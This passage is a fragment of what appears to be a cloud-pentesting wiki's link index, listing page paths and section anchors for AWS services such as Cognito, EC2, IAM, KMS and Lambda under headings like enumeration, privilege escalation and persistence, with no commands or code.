udhsm-enum.html#what-is-a-hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#aws---cloudfront-enum","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#cloudfront","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#functions","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#aws---codebuild-enum","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#codebuild","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#githubgitlabbitbucket-credentials","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#accessing-iam-roles","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#unauthenticated","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#enhanced-vs-basic-authentication-flow","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#authenticated","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#potential-attacks","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#registration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#verifying-registration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#privilege-escalation--updating-attributes","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#recoverchange-password","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#authentication","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#extra-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#advanced-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-remember-device","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user-pool-groups-iam-roles","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#references","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---directory-services--workdocs-enum","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#directory-services","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#options","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#lab","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#login","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#using-an-ad-user","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-victim-to-attacker","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-attacker-to-victim","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---dynamodb-enum","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#backups--export-to-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#sql-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#raw-json-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc--vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc--networking","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#instance-profiles","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#metadata-endpoint","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#difference-ami--ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#perssistence","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#launch-templates--autoscaling-groups","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-3","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-4","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#local-enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#references","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-cli-installation","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#run-an-image","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#enumerate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#terminate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-client","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-atestation--kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pcr-bypass","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-networking-in-a-nutshell","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#route-tables","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acls","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#security-groups","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#elastic-ip-addresses","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#connection-between-subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-peering","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-flow-logs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#basic-aws-vpn-components","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#site-to-site-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#client-vpn","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#unauthenticated-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#sensitive-data-in-task-definitions","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#application--environments","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-types-of-environments","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#exposure","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#network-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mount-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#access-points","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs-ip-address","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---eventbridge-scheduler-enum","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#types-of-schedules","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#targets","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#post-exploitation--defense-bypass","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-identity-center--sso-enum","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#permissions-brute-force","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-persistence","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-identity-center","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#connect-via-sso-with-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#local-enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#unauthenticated-access-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#privilege-escalation-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---key-management-service","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#key-policies","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#key-administrators","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#rotation-of-cmks","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#other-relevant-kms-information","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-aliases-weights","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#resource-policies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-database-proxies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-efs-filesystems","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-layers","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-extensions","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#invoke-a-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#analyse-snapshots","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#metadata","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#amazon-macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#alert-system","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#dashboard-features","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#user-categorization","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#identity-types","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#data-classification","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#research-and-analysis","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#listing-findings-with-aws-console","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#revealing-secret","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#introduction-to-message-brokers","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#types","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#kafka-iam-access-in-serverless","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizations-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#baisc-information","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---relational-database-rds-enum","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#credentials","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#authentication","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#public-access--vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#sql-injection","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#ip-based-routing","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---secrets-manager-enum","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-